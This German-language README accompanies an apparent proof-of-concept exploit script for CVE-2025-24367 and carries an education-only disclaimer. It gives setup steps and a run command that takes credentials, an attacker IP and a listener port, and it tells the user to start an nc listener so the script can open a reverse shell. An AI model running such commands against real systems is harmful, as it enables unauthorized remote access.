
Proof of Concept for CVE-2025-24367
Wichtig — Lesen Sie dies zuerst:
Dieses Repository undexploit.pywerden nur zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie diesen Code nicht gegen Systeme, Netzwerke oder Dienste, für die Sie keine ausdrückliche, schriftliche Genehmigung haben. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch. Durch die Nutzung dieses Codes erklären Sie sich damit einverstanden, die geltenden Gesetze und institutionellen Richtlinien einzuhalten.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Stellen Sie vor dem Ausführen des Skripts sicher, dass ein nc-Listener läuft. Führen Sie das Skript ohne Proxy aus, es sei denn, Sie debuggen:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Abschließende Erinnerung: Dieses Skript und die README dienen nur zu Bildungszwecken. Verwenden Sie diese Tools niemals, um unrechtmäßig auf Systeme zuzugreifen.